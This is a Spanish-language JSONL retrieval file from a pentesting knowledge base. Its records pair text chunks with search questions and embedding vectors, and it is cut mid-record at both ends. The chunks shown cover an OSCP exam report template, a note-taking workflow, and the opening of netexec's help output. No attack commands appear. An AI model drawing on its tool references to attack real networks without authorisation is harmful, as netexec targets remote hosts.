0.11776, -0.03175, -0.01947, -0.11253, -0.04186, 0.04302, 0.04969, -0.06934, -0.04182, 0.00287, 0.03611, -0.01005, -0.06449, -0.03127, -0.02941, 0.04473, 0.09527, -0.07562, -0.03523, -0.01218, 0.00783, -0.07919, -0.01537, -0.02299, -0.07139, 0.03269, 0.00188, 0.0059, 0.00649, -0.02344, 0.04757, 0.0532, -0.17309, -0.01333, -0.08878, 0.0709, 0.03086, -0.04693, -0.01257, 0.03165, 0.04958, -0.07343, -0.00792, -0.12783, 0.06038, -0.04516, -0.00289, 0.01241, 0.05384, -0.06469, 0.06301, 0.00323, -0.01055, -0.1449, 0.05919, -0.03912, 0.01509, 0.02062, -0.04293, 0.04491, -0.03767, -0.01959, 0.01134, 0.08369, -0.01207, -0.00315, -0.02109, 0.04768, -0.06449, -0.00153, -0.08338, -0.06091, -0.03977, 0.02126, -0.02771, 0.00499, 0.03229, -0.00198, 0.02818, 0.01085, -0.05662, 0.00196, 0.03477, 0.01394, 0.1008, 0.04274, 0.0187, 0.01138, -0.00606, 0.04311, -0.028, -0.05892, -0.03102, 0.06185, 0.02691, -0.0875, -0.01078, -0.05508, -0.01725, 0.0581, 0.09639, -0.07292, -0.04728, -0.07092, 0.02684, -0.00711, 0.00706, 0.04957, -0.04458, -0.13319, -0.0488, 0.02035, 0.01112, -0.06728, 0.01193, 0.08218, -0.00165, 0.04635, 0.02637, -0.00136, -0.02922, 0.06303, -0.02002, -0.01784, -0.04797, -0.04067, -0.01872, -0.03308, -0.02602, 0.053, 0.01513, 0.01292, -0.05361, -0.08815, -0.00558, 0.01693, 0.07049, -0.00484, -0.0282, -0.02839, -0.02541, -0.03824, 0.044, -0.01524, -0.11547, 0.03438, 0.01918, 0.03525, -0.04338, 0.04053, -0.01936]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "ΒΏquΓ© herramienta sirve para redactar informes de examen OSCP?", "v": [-0.02714, 0.03682, -0.06246, -0.23029, 0.25348, -0.28811, 0.00969, -0.04522, -0.06931, -0.0249, -0.08376, -0.06897, -0.02137, -0.08911, 0.09786, 0.11669, 0.09309, 0.00901, -0.01819, -0.01244, 0.02553, -0.03534, -0.06203, 0.09683, -0.08776, -0.01939, -0.02577, -0.05252, -0.08079, -0.03926, -0.02844, 0.12647, -0.00637, -0.03528, -0.07868, 0.04357, -0.04206, -0.04634, -0.09477, 0.1575, 0.00993, 0.01857, -0.01415, 0.06828, 0.0577, 0.02118, -0.03978, 0.11637, 0.02331, 0.05555, -0.05919, -0.11889, -0.09986, 0.05027, -0.12677, -0.05849, 0.17155, -0.02997, 0.10344, -0.13472, 0.05764, -0.00011, -0.03942, -0.08931, 0.0237, -0.0738, -0.03406, -0.05278, -0.05626, 0.05516, -0.05549, 0.03004, 0.05022, 0.01207, -0.07473, -0.10456, -0.05333, 0.0265, 0.10813, 0.02687, 0.05647, -0.06764, -0.14369, 0.10141, -0.08155, -0.1183, 0.05522, -0.06036, -0.05071, -0.03019, -0.00557, 0.02106, -0.0227, 0.03929, 0.02794, -0.03158, 0.091, -0.08078, 0.0151, -0.02761, 0.09518, -0.01838, 0.01797, -0.004, -0.12356, 0.07059, 0.04145, -0.0094, 0.03105, 0.00453, 0.05937, 0.06892, -0.03688, 0.02922, -0.03697, -0.02903, 0.00892, -0.00753, -0.04664, -0.04339, 0.04274, 0.09285, -0.07101, 0.03124, -0.01279, 0.00506, 0.03592, 0.06577, 0.04298, 0.00459, 0.02798, -0.02282, -0.11778, 0.02531, -0.07258, -0.0933, -0.01434, -0.13851, 0.01432, -0.03259, 0.01946, 0.0485, -0.00695, -0.03265, 0.03642, 0.02434, 0.01714, 0.0157, -0.05725, -0.0139, 0.02449, -0.09186, 0.0102, 0.03833, -0.07857, -0.03581, 0.01366, 0.00414, -0.03328, 0.07542, -0.0606, -0.07459, 0.05452, -0.01303, 0.02168, -0.0098, -0.01425, -0.02383, 0.05231, 0.00792, 0.03019, -0.05893, 0.03625, -0.07158, 0.0555, -0.10653, -0.01022, 0.04715, 0.01006, -0.03769, -0.05135, 0.03219, -0.07405, 0.01347, 0.07073, 0.04714, 0.05837, -0.06293, 0.05693, 0.03055, 0.02137, 0.0369, 0.01899, -0.06062, 0.03211, 0.01357, -0.02347, -0.12898, 0.07626, -0.01421, -0.05605, -0.00977, -0.03707, -0.04612, 0.05179, 0.04499, -0.00967, 0.0552, -0.02139, 0.02951, -0.02865, -0.01653, 0.03677, 0.00411, 0.00306, 0.00083, 0.05685, 0.02948, -0.02107, 0.01164, 0.04244, 0.01388, 0.04839, -0.0079, 0.00231, 0.01381, 0.06779, -0.02192, 0.03468, 0.01155, 0.03679, 0.00903, 0.00353, -0.028, 0.08501, -0.02399, 0.03167, 0.0027, -0.03816, -0.06139, 0.01489, 0.02926, 0.00286, -0.04943, -0.04504, -0.00994, 0.02582, -0.04173, -0.00497, -0.08852, -0.02532, -0.00763, 0.07439, -0.04758, 0.02862, -0.04354]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "con quΓ© puedo crear un informe de certificaciΓ³n en formato Markdown?", "v": [0.00375, 0.11982, -0.08979, -0.1213, 0.11053, -0.11789, -0.06957, 0.0559, -0.16422, -0.14063, -0.06697, -0.11697, 0.03605, -0.10155, -0.02013, 0.10918, 0.06681, -0.09888, -0.0329, 0.04259, 0.10393, -0.13867, -0.05839, -0.08178, -0.02856, -0.02652, -0.04696, 0.03188, -0.09357, 0.03023, 0.10373, 0.10749, -0.00228, 0.04316, 0.05093, 0.01464, 0.08498, 0.00723, -0.10401, 0.11559, -0.09229, -0.05383, 0.0719, 0.01001, 0.04948, -0.07106, 0.00416, 0.08255, 0.04684, 0.08086, -0.02976, -0.06657, -0.13543, 0.04346, -0.12066, 0.00926, 0.04393, -0.02923, 0.104, -0.0121, -0.15184, -0.02422, 0.00312, -0.08402, 0.11379, 0.05873, 0.11371, 0.06158, 0.0301, 0.08688, 0.13278, -0.09835, 0.10088, -0.0991, -0.02156, 0.00697, -0.08815, 0.01923, -0.07729, 0.01878, 0.0349, 0.07391, -0.04931, -0.09883, -0.07348, 0.0801, -0.07681, 0.02714, -0.04289, -0.12625, 0.04172, -0.03746, 0.0113, 0.00654, -0.00636, -0.00624, 0.06017, -0.07367, -0.08642, -0.02713, -0.12454, 0.05579, -0.03128, 0.03499, -0.02401, 0.0615, 0.03337, -0.04561, 0.02322, 0.11025, 0.04302, 0.19619, -0.03669, 0.01027, -0.03304, -0.01152, 0.01569, 0.00242, -0.00127, 0.02297, 0.02958, 0.03707, -0.05262, 0.02676, -0.01189, 0.038, -0.02665, 0.04193, -0.02036, 0.0104, 0.05511, 0.06906, -0.06528, -0.08781, 0.01139, -0.00512, -0.0381, 0.00597, -0.06335, -0.06025, 0.00135, -0.00596, 0.08356, 0.08395, 0.01738, -0.04398, -0.09565, -0.10461, -0.073, 0.06068, -0.0829, 0.05762, -0.00504, -0.01327, -0.07775, 0.008, 0.01404, -0.08013, 0.03607, 0.08984, -0.03879, -0.00701, -0.04305, -0.00349, -0.00101, 0.01033, 0.0246, 0.01989, 0.00364, 0.00836, -0.02521, -0.02849, -0.00822, -0.12418, 0.15713, -0.00124, -0.05942, -0.06492, -0.05287, -0.03681, 0.00161, 0.0134, -0.05564, -0.02138, 0.01308, -0.02725, 0.03576, -0.00726, 0.04865, 0.0291, -0.00956, 0.1025, 0.02618, -0.01125, -0.00345, -0.01982, -0.01494, -0.02803, 0.02047, -0.06157, -0.02001, -0.05674, 0.01326, -0.01702, 0.09032, 0.01878, -0.04401, 0.09883, 0.05394, 0.04715, 0.02361, -0.03062, -0.01338, -0.03012, -0.06082, 0.09151, -0.02109, 0.0014, 0.00147, -0.03673, 0.03134, -0.01417, 0.0697, -0.00417, 0.02144, -0.03764, 0.07582, -0.04846, -0.02668, 0.071, 0.03396, 0.01651, -0.05202, 0.02452, 0.04021, 0.00305, -0.00715, -0.03211, -0.0616, -0.02247, -0.03321, 0.07894, -0.01108, -0.03113, -0.04797, 0.03911, -0.03484, 0.06051, -0.00654, -0.10304, -0.03097, 0.03206, 0.05845, -0.0003, -0.04539, -0.06807]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "existe alguna alternativa libre a esa plantilla de OSCP?", "v": [-0.13831, 0.00231, -0.14501, -0.07876, -0.09095, -0.19349, 0.06498, -0.10219, -0.20002, -0.05812, 0.04189, -0.08158, 0.05247, 0.0995, 0.15252, -0.12656, 0.02837, -0.00588, 0.15095, -0.03932, -0.18068, -0.03653, -0.14221, 0.00863, 0.08057, 0.02169, -0.09522, -0.00827, -0.08327, -0.06966, 0.04017, 0.08616, -0.01261, 0.01815, 0.01737, 0.07532, -0.0221, -0.09471, 0.10113, -0.0497, -0.00088, 0.04298, -0.00444, 0.11054, 0.0585, -0.00704, -0.05023, 0.1493, -0.0056, 0.04076, -0.09348, -0.07771, -0.0471, -0.07253, 0.05246, -0.00785, 0.15745, -0.03214, -0.00283, -0.04123, -0.08915, 0.08132, -0.0022, -0.12538, 0.05809, 0.06693, -0.1048, -0.02663, -0.10039, 0.03413, -0.04287, 0.01108, -0.05207, -0.04303, -0.05822, -0.06553, 0.0055, -0.00739, 0.07134, 0.11475, 0.03353, -0.11462, 0.08427, 0.04144, -0.07505, -0.07015, 0.08639, -0.03032, -0.03655, -0.0497, 0.07738, 0.10451, -0.07284, 0.12155, -0.01282, -0.11752, -0.02883, 0.10147, 0.0192, 0.05789, 0.00019, 0.1451, -0.0588, -0.04644, -0.01867, 0.03865, 0.06787, 0.00396, 0.03437, -0.00042, 0.0359, 0.02039, -0.00867, 0.06231, -0.05941, -0.10315, 0.00889, 0.05049, -0.03113, 0.03818, -0.01414, 0.00314, -0.01016, -0.06564, 0.01669, 0.07119, 0.05009, 0.08143, -0.04015, 0.04215, 0.00407, -0.07693, -0.06745, -0.05731, -0.16707, -0.06853, 0.01512, 0.00312, 0.06382, -0.02766, -0.04067, 0.06042, 0.00395, -0.02249, -0.02159, -0.07961, -0.04806, -0.04109, -0.00071, -0.03152, -0.04344, -0.00764, -0.00519, 0.13601, -0.01627, 0.06796, 0.01074, 0.02641, -0.02834, 0.11833, 0.04963, -0.06858, -0.08424, 0.07011, -0.04117, 0.02039, 0.00938, -0.04843, -0.03528, 0.05222, 0.04049, 0.09967, 0.10721, -0.04729, 0.05334, -0.0237, 0.00592, -0.05452, 0.03459, 0.03507, 0.03193, 0.02578, -0.02171, -0.02708, 0.07147, -0.02089, -0.03175, 0.05463, -0.02407, -0.01762, 0.02021, -0.03865, -0.03371, -0.04157, -0.02308, -0.00654, 0.06712, -0.07891, 0.01001, -0.00243, -0.05437, -0.03844, 0.01702, -0.02258, 0.00549, -0.02547, -0.03653, 0.04302, 0.01039, 0.01579, 0.05095, 0.00085, 0.03753, -0.00354, 0.01932, 0.03527, 0.03396, 0.00409, 0.01901, 0.00503, 0.05271, 0.02797, 0.03851, 0.02162, 0.00153, 0.05155, -0.02896, 0.05574, -0.00574, 0.01171, 0.04834, 0.03686, 0.06272, -0.00294, -0.00922, 0.00524, -0.03588, 0.03034, 0.0277, 0.0315, 0.01978, -0.00156, -0.00785, 0.0093, -0.03193, -0.0026, -0.0399, -0.10375, -0.00295, -0.01329, 0.01659, 0.0158, 0.007, -0.02442, 0.0244, 0.05487]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que programa me ayuda a documentar pasos antes de pasar al siguiente host en un examen de ciberseguridad?", "v": [0.09299, 0.06872, -0.07777, -0.22765, 0.03209, -0.1186, 0.00067, -0.03998, -0.12182, -0.04491, -0.04939, -0.04597, -0.08061, -0.07997, -0.02937, -0.02081, 0.17817, 0.04254, 0.10435, -0.01491, 0.04414, -0.00096, 0.021, 0.04503, 0.03563, -0.023, -0.00934, -0.00676, 0.00314, -0.06559, 0.05768, -0.00163, -0.02867, -0.02952, -0.01338, 0.01171, 0.02908, -0.09169, -0.0687, 0.08254, -0.06536, -0.05433, 0.06337, 0.07268, 0.04629, -0.00435, -0.01536, -0.04531, 0.03883, -0.17472, 0.04055, -0.02784, -0.08163, -0.03385, -0.01221, -0.09307, 0.0111, -0.17183, 0.06185, -0.14619, -0.01584, 0.07095, -0.01555, 0.06978, 0.16424, 0.01447, 0.09335, 0.02565, -0.17751, 0.05724, -0.0426, 0.08742, -0.02135, -0.01243, -0.11403, -0.10502, -0.01993, -0.06054, -0.01093, -0.03513, -0.01472, 0.01093, 0.09515, 0.12335, -0.17149, -0.06569, 0.00435, 0.01709, 0.03123, -0.04192, 0.0465, 0.09875, 0.02507, 0.01134, 0.13771, -0.04882, 0.15583, 0.00336, -0.10667, -0.00499, 0.0098, -0.01744, -0.05703, 0.07043, -0.04205, 0.14225, -0.0129, -0.0141, -0.15061, -0.00094, 0.00392, 0.07379, -0.10176, -0.09725, -0.09226, -0.03412, 0.02512, -0.0238, -0.00785, -0.00033, 0.00096, -0.00054, -0.04217, -0.03067, 0.10005, 0.07444, -0.01271, 0.0957, 0.01647, -0.02819, 0.04268, 0.04714, -0.04071, 0.01201, 0.00679, -0.03086, -0.0277, -0.1232, -0.04471, -0.07427, 0.05854, 0.04336, 0.01815, -0.00787, 0.07221, 0.03537, -0.0565, -0.07561, -0.08889, 0.07195, -0.05846, 0.02033, 0.03254, 0.04431, -0.06538, -0.00018, 0.03891, -0.07816, -0.04524, 0.04276, 0.02516, -0.02111, -0.04509, -0.10729, 0.0522, 0.04093, -0.02087, 0.02308, 0.01399, 0.03486, 0.00049, 0.01456, 0.01722, -0.0786, 0.04672, -0.0195, 0.01678, -0.11146, -0.01284, -0.07384, -0.02862, 0.04611, 0.07111, 0.0576, 0.0289, -0.0366, 0.01321, 0.01452, 0.05178, 0.07905, 0.02192, 0.01305, -0.05504, 0.03272, -0.01609, -0.03386, -0.03939, -0.02201, 0.09094, -0.01379, -0.08791, -0.0274, -0.02329, -0.00367, 0.02098, 0.09222, -0.0502, 0.00924, 0.01969, 0.06048, -0.01619, -0.03346, 0.07299, -0.03355, -0.06695, -0.03643, 0.02319, 0.10064, -0.08725, 0.00024, 0.01703, 0.06608, 0.02643, 0.04759, 0.02759, -0.0068, 0.1049, -0.00225, 0.00246, -0.03351, -0.03935, -0.02276, -0.04617, 0.00382, 0.08573, -0.02783, -0.00719, -0.04902, -0.04149, -0.05897, 0.00515, 0.07105, -0.04896, -0.06732, -0.00796, 0.00493, -0.05532, 0.04048, 0.00427, -0.0465, -0.0101, 0.01215, 0.05348, -0.044, 0.02448, -0.00137]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con quΓ© puedo organizar capturas y comandos por cada mΓ‘quina para montar un reporte final?", "v": [0.18022, 0.15173, -0.13532, -0.14519, -0.09651, -0.07872, 0.08852, 0.11046, -0.13136, -0.12112, -0.13666, -0.02879, 0.09548, 0.00791, 0.00373, 0.09798, 0.08298, 0.05051, -0.0451, -0.01541, -0.01317, -0.08188, 0.01202, -0.02421, 0.03466, 0.00478, 0.16813, -0.00204, -0.24436, -0.11595, 0.01434, 0.12144, 0.11418, 0.02651, -0.0065, -0.08876, -0.0123, -0.0036, -0.08524, 0.05946, -0.07303, -0.04532, -0.20655, 0.01164, 0.12496, -0.09015, 0.08265, 0.03236, 0.05442, -0.02755, 0.09263, 0.02512, -0.05141, 0.03591, -0.13832, -0.15911, 0.0448, -0.03295, 0.0795, 0.00975, -0.04317, 0.01022, 0.0136, 0.1064, 0.01249, 0.02202, -0.05291, -0.07527, -0.03185, 0.03198, -0.01234, -0.00404, 0.0063, 0.04671, 0.04987, 0.02129, -0.0351, 0.02419, 0.04925, 0.04092, -0.09086, -0.06058, -0.11533, 0.06187, -0.02397, -0.06386, -0.05785, -0.09582, -0.00214, -0.14389, 0.03157, 0.05178, 0.01841, -0.01448, 0.07894, -0.05415, 0.10529, 0.09453, 0.01909, 0.02602, -0.03501, -0.03718, -0.01842, 0.16733, -0.05411, 0.0138, 0.04831, -0.02882, 0.05564, -0.0001, -0.05064, 0.03969, -0.04699, 0.07479, -0.06417, -0.10566, -0.00013, -0.02645, 0.00881, -0.01841, -0.02323, 0.10412, 0.09258, -0.00339, 0.01227, -0.03266, 0.04868, 0.12891, 0.05502, -0.04937, 0.01106, 0.03552, 0.00517, 0.02907, -0.00669, 0.05141, 0.04429, -0.03986, -0.08485, -0.12077, -0.03168, 0.02309, -0.04227, -0.07514, 0.03566, 0.04285, 0.05829, -0.04214, -0.07793, 0.01818, 0.15307, 0.01254, -0.0476, -0.01591, -0.03981, 0.06208, -0.05659, -0.06531, -0.03294, 0.03891, -0.07742, -0.03382, -0.04918, -0.0104, 0.02328, -0.06159, 0.03481, 0.0066, -0.00473, -0.02915, -0.01164, -0.01111, 0.00589, -0.02662, 0.04784, -0.02402, -0.01418, 0.00274, 0.03529, -0.05601, 0.02081, 0.11372, -0.00533, -0.01711, -0.0231, -0.00047, 0.01388, 0.02439, -0.0132, 0.00398, 0.02473, 0.02989, 0.01653, -0.03494, 0.04445, -0.05768, 0.01023, 0.0342, 0.04412, -0.01953, -0.039, -0.00623, -0.02726, 0.02164, 0.01305, 0.01842, -0.07268, 0.08064, 0.0764, 0.02697, 0.01507, 0.01086, -0.02708, -0.09062, -0.04916, 0.00548, -0.00955, -0.0054, -0.04624, -0.01597, 0.00825, -0.00658, 0.01927, 0.02266, 0.03506, -0.00631, -0.02045, 0.02244, 0.09801, 0.01378, -0.04489, 0.02339, -0.02353, -0.01515, -0.02014, -0.00453, -0.00174, -0.01684, 0.00088, -0.00284, 0.02996, 0.04799, 0.02642, -0.06045, -0.0356, -0.01112, -0.05383, 0.06107, -0.01939, -0.06037, 0.00247, 0.02216, 0.03742, -0.02604, -0.057, 0.00441]} +{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "cual es una herramienta para tomar notas estructuradas durante una evaluaciΓ³n de penetraciΓ³n?", "v": [-0.01818, 0.09202, -0.15459, -0.19564, 0.07309, -0.06388, -0.06362, -0.00047, -0.02619, 0.05207, -0.1034, -0.00416, -0.03218, -0.03183, -0.00293, 0.04519, 0.07061, -0.1167, -0.03321, 0.10557, -0.09035, -0.00386, -0.09465, 0.0873, -0.09833, 0.0579, -0.07452, 0.05598, -0.02165, 0.08844, -0.02584, 0.00347, 0.05137, -0.10255, -0.1173, -0.00555, 0.02419, 0.03529, -0.06148, 0.12784, -0.05263, 0.06958, -0.01957, 0.05985, 0.13044, -0.10407, -0.0421, 0.12133, 0.01068, -0.01816, 0.02962, 0.04913, -0.06474, -0.01964, 0.03851, -0.16684, 0.18619, -0.09719, 0.0363, -0.07248, -0.08827, 0.05041, -0.05713, -0.06309, 0.03339, -0.08369, 0.00507, -0.09799, -0.01828, 0.08625, 0.09128, -0.00336, -0.00595, -0.12361, -0.01589, 0.05421, 0.04089, 0.05366, 0.01797, -0.03091, 0.04598, 0.00411, -0.18065, 0.10601, -0.12116, -0.0513, 0.09124, -0.0974, 0.01219, 0.05598, -0.04439, -0.01525, -0.06971, 0.03795, -0.03044, -0.03921, 0.02768, -0.02819, 0.0277, 0.0144, 0.10295, -0.07509, -0.0547, 0.10469, -0.03965, 0.06894, -0.10315, 0.00823, -0.05448, -0.10631, 0.07055, 0.03331, -0.10246, -0.06507, -0.04777, 0.04183, -0.01956, -0.04056, -0.07088, -0.12917, 0.05273, 0.08183, -0.11798, -0.1093, -0.0676, -0.03022, -0.05848, 0.00415, 0.08878, -0.00741, 0.02145, 0.02805, -0.07399, 0.03608, 0.03772, -0.09539, 0.00255, -0.09186, -0.03045, -0.11561, 0.00555, 0.05429, 0.02297, -0.02344, 0.02845, 0.04696, -0.02405, -0.00677, -0.05438, 0.0524, -0.06016, -0.00689, -0.01657, 0.05588, -0.01552, 0.01203, -0.0204, 0.02147, -0.0825, 0.07653, -0.02528, -0.02669, 0.05047, 0.04366, 0.04878, -0.04357, -0.02715, 0.00704, 0.06387, -0.01476, 0.02593, -0.02154, 0.01872, 0.02374, -0.00345, -0.11826, -0.08188, -0.04813, -0.00533, -0.05906, -0.01547, 0.00989, -0.09401, -0.03843, 0.03929, 0.04129, -0.04037, -0.01347, -0.00665, 0.07358, 0.0804, 0.02454, -0.02749, -0.0335, 0.08151, 0.00127, -0.07122, -0.04558, 0.01955, -0.02712, -0.033, -0.07437, -0.02854, -0.09207, 0.02051, 0.04531, -0.03354, -0.03155, 0.01475, 0.0558, 0.0335, 0.00274, 0.01867, -0.01722, -0.06944, -0.02971, 0.02588, 0.05358, -0.04551, -0.00161, 0.00235, 0.03828, 0.09516, -0.0222, -0.07132, 0.01567, -0.00556, 0.01788, 0.02055, 0.01018, 0.02638, -0.02017, -0.01865, -0.00529, 0.07292, -0.07574, 0.00819, -0.03731, -0.04341, -0.0316, 0.07033, 0.07723, -0.0205, -0.02725, -0.03647, -0.03359, 0.00192, -0.00925, -0.03751, -0.11105, -0.02038, 0.02161, 0.06604, -0.09037, 0.04881, -0.04831]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# netexec β€” manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /Λ™-Λ™\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n Λ™ \\ / Λ™\n Λ™ Λ™\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "indexar": "que programa sirve para probar los puertos y servicios de una red?", "v": [0.09802, -0.0354, -0.16395, -0.19206, 0.07422, -0.09775, 0.16569, -0.11043, -0.04398, -0.16314, -0.1133, -0.02168, 0.10406, -0.15083, -0.04145, -0.04455, 0.03213, -0.03759, 0.11302, 0.06329, 0.02724, -0.01878, -0.10982, -0.03699, 0.03734, 0.10089, 0.12165, -0.10088, -0.02568, 0.09516, -0.03628, -0.06032, 0.08524, -0.11999, -0.04715, -0.06754, 0.09362, 0.00083, 0.08684, 0.09754, 0.07282, -0.0357, 0.02758, -0.00013, 0.07652, 0.00616, -0.00595, -0.04238, -0.00501, 0.00926, -0.00442, -0.05584, -0.09694, -0.01906, -0.03441, -0.04417, -0.09858, -0.05867, -0.13441, -0.03774, 0.02617, -0.01768, 0.00196, -0.02131, 0.07585, -0.10335, -0.00922, 0.08772, -0.08387, 0.04908, -0.06351, 0.04512, -0.00288, 0.0236, -0.07662, -0.05189, -0.02145, -0.0033, 0.05622, -0.02051, -0.01063, 0.06437, -0.06623, 0.02446, -0.03755, -0.08834, -0.0516, -0.03003, 0.03036, -0.10087, 0.10416, 0.02738, 0.07139, 0.12728, -0.00064, 0.00664, 0.13427, 0.00592, 0.06128, -0.02, 0.12529, 0.02145, -0.08643, 0.05752, -0.07287, 0.07194, 0.09099, -0.05125, 0.04911, 0.05143, 0.04731, -0.04341, -0.00032, -0.04011, -0.03854, -0.07164, -0.03446, -0.09053, 0.00665, 0.00614, -0.03008, -0.03355, -0.06734, 0.02992, 0.0403, -0.01117, -0.01366, 0.05998, 0.03136, 0.09416, 0.04514, 0.02032, -0.05357, -0.03915, -0.05015, -0.09979, 0.04388, -0.08389, 0.01219, -0.03744, -0.01716, 0.12327, -0.05219, -0.01014, 0.00965, 0.05579, 0.03915, -0.01201, -0.02131, 0.05961, -0.02584, 0.02277, -0.06838, 0.04103, -0.12095, 0.00395, 0.10237, -0.04834, -0.07356, 0.08709, -0.04247, -4e-05, -0.0023, 0.00305, 0.07163, -0.03771, -0.00389, 0.01226, 0.12064, 0.04236, -0.03665, 0.12393, -0.06224, -0.1122, -0.0038, 0.03691, -0.04376, -0.11429, -0.00319, -0.02803, -0.04091, 0.04018, 0.0002, -0.00938, -0.06259, -0.08737, -0.05912, -0.04914, 0.01907, 0.00854, -0.00699, -0.03327, -0.05096, 0.02484, -0.00209, 0.03527, -0.02427, 0.0081, -0.01695, -0.07458, -0.02939, 0.01826, 0.00275, -0.00503, -0.00356, 0.06689, -0.02263, 0.07095, 0.03984, 0.13657, -0.02136, 0.01712, 0.06441, -0.00251, -0.07015, -0.01177, 0.03632, 0.05263, 0.07385, 0.08534, -0.02338, -0.0233, -0.05387, 0.08834, -0.00608, -0.01843, 0.08897, 0.01955, 0.03051, 0.03169, 0.05069, -0.04274, -0.04983, -0.02618, -0.00976, -0.01757, 0.03418, 0.01358, -0.03643, -0.11474, -0.00033, 0.04626, -0.04238, -0.05447, 0.06394, -0.04766, -0.04215, -0.0015, 0.0393, 0.00369, -0.05885, 0.0712, 0.02691, -0.0366, 0.04653, 0.01529]} +{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# netexec β€” manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /Λ™-Λ™\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n Λ™ \\ / Λ™\n Λ™ Λ™\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "indexar": "con que puedo realizar un escaneo rΓ‘pido de mΓΊltiples objetivos simultΓ‘neamente?", "v": [0.0315, 0.12471, -0.22695, 0.01891, 0.0282, -0.02614, -0.1086, -0.04056, -0.13839, -0.04841, -0.08247, 0.05575, 0.10607, -0.12282, 0.10671, 0.13373, -0.03771, -0.03596, -0.07164, 0.10158, 0.00855, -0.16247, -0.05818, 0.04024, -0.02092, 0.08969, 0.01048, 0.15882, -0.12076, -0.02916, -0.00203, 0.16305, 0.06161, -0.07689, 0.06036, -0.08978, -0.02095, 0.13629, 0.00323, -0.09243, -0.03548, 0.06194, -0.20311, -0.12094, 0.12787, 0.02375, -0.01316, 0.04129, -0.04395, -0.04391, 0.01665, 0.02058, -0.09784, -0.06132, 